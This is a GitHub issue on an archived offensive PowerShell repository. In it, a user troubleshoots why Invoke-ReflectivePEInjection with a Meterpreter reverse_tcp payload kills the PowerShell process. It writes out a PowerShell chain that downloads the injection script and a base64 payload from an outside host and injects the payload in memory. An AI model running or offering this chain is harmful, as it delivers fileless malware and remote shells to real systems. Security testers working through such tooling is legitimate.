This repository was archived by the owner on Jan 21, 2021. It is now read-only.
This repository was archived by the owner on Jan 21, 2021. It is now read-only.
Invoke-ReflectivePEInjection with meterpreter exe payload quits powershell #362
Description
Hello --
I have been using the patched version of Invoke-ReflectivePEInjection (available here) and I can successfully run calc.exe just fine.
However, if I try a meterpreter payload, meterpreter will successfully connect to msfconsole for a split second before the powershell task exits.
So far I have tried:
Inject into something like explorer -- not possible as meterpreter as it is not compiled with ASLR.
Changing the EXITFUNC to meterpreter
Using windows/x64/meterpreter/reverse_tcp (Reflective Injection x64)
Using windows/x64/meterpreter_reverse_tcp (regular -- inline reverse tcp x64)
Here are the commands I am using:
IEX ((New-Object System.Net.WebClient).DownloadString("http://192.168.56.102:4444/Invoke-ReflectivePEInjection.ps1"))
$based = ((New-Object System.Net.WebClient).DownloadString("http://192.168.56.102:4545/b64.exe"))
$PEBytes = [System.Convert]::FromBase64String($based)
Invoke-ReflectivePEInjection -ForceASLR -PEBytes $PEBytes